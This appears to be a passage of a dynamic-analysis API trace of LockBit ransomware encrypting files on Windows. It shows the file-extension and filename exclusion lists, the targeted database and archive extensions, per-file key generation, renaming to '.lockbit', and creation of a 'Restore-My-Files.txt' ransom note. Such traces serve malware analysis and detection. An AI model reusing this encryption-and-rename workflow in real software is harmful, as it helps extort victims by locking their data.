[0177.850] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.851] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.851] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01563_.WMF.lockbit") returned 72 [0177.851] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01563_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01563_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0177.852] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.852] malloc (_Size=0x40068) returned 0x3df0008 [0177.853] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5060) returned 1 [0177.853] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.853] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.853] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.854] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.854] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.859] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01563_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01563_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.859] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.859] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.861] free (_Block=0x1fa2ed8) [0177.861] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01563_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.861] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.861] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.861] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f39c000, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7f39c000, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY01572_.WMF", cAlternateFileName="")) returned 1 [0177.861] lstrcmpiW (lpString1=".", lpString2="SY01572_.WMF") returned -1 [0177.861] lstrcmpiW (lpString1="..", lpString2="SY01572_.WMF") returned -1 [0177.861] PathFindExtensionW (pszPath="SY01572_.WMF") returned=".WMF" [0177.861] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.861] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.861] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.861] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.861] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.861] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.861] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.862] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.862] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.863] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY01572_.WMF") returned -1 [0177.863] lstrcmpiW (lpString1="ntldr", lpString2="SY01572_.WMF") returned -1 [0177.863] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY01572_.WMF") returned -1 [0177.863] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY01572_.WMF") returned -1 [0177.863] lstrcmpiW (lpString1="autorun.inf", lpString2="SY01572_.WMF") returned -1 [0177.863] lstrcmpiW (lpString1="thumbs.db", lpString2="SY01572_.WMF") returned 1 [0177.863] lstrcmpiW (lpString1="iconcache.db", lpString2="SY01572_.WMF") returned -1 [0177.863] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.864] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01572_.WMF") returned=".WMF" [0177.864] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.864] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.864] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.865] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.865] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.865] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.865] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.865] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.865] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01572_.WMF.lockbit") returned 72 [0177.865] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01572_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01572_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.867] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.867] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.867] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3304) returned 1 [0177.867] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.868] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.876] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01572_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01572_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.876] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.876] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.878] free (_Block=0x1fa2ed8) [0177.878] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01572_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.878] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.878] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.878] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda9a9b00, ftCreationTime.dwHighDateTime=0x1bd4c4d, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xda9a9b00, ftLastWriteTime.dwHighDateTime=0x1bd4c4d, nFileSizeHigh=0x0, nFileSizeLow=0x338e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY01590_.WMF", cAlternateFileName="")) returned 1 [0177.878] lstrcmpiW (lpString1=".", lpString2="SY01590_.WMF") returned -1 [0177.878] lstrcmpiW (lpString1="..", lpString2="SY01590_.WMF") returned -1 [0177.878] PathFindExtensionW (pszPath="SY01590_.WMF") returned=".WMF" [0177.878] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.878] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.879] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.880] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.880] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY01590_.WMF") returned -1 [0177.880] lstrcmpiW (lpString1="ntldr", lpString2="SY01590_.WMF") returned -1 [0177.880] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY01590_.WMF") returned -1 [0177.881] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY01590_.WMF") returned -1 [0177.881] lstrcmpiW (lpString1="autorun.inf", lpString2="SY01590_.WMF") returned -1 [0177.881] lstrcmpiW (lpString1="thumbs.db", lpString2="SY01590_.WMF") returned 1 [0177.881] lstrcmpiW (lpString1="iconcache.db", lpString2="SY01590_.WMF") returned -1 [0177.881] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.881] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01590_.WMF") returned=".WMF" [0177.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.881] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.881] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.882] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.882] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.882] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.882] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.882] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.882] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.882] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.882] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01590_.WMF.lockbit") returned 72 [0177.882] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01590_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01590_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0177.883] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.883] malloc (_Size=0x40068) returned 0x3df0008 [0177.883] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13198) returned 1 [0177.883] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.884] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.884] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.884] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.884] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.886] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01590_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01590_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.886] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.886] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.888] free (_Block=0x1fa2ed8) [0177.888] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01590_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.888] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.888] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.888] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x8b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="TAIL.WMF", cAlternateFileName="")) returned 1 [0177.888] lstrcmpiW (lpString1=".", lpString2="TAIL.WMF") returned -1 [0177.888] lstrcmpiW (lpString1="..", lpString2="TAIL.WMF") returned -1 [0177.888] PathFindExtensionW (pszPath="TAIL.WMF") returned=".WMF" [0177.888] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.888] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.889] lstrcmpiW 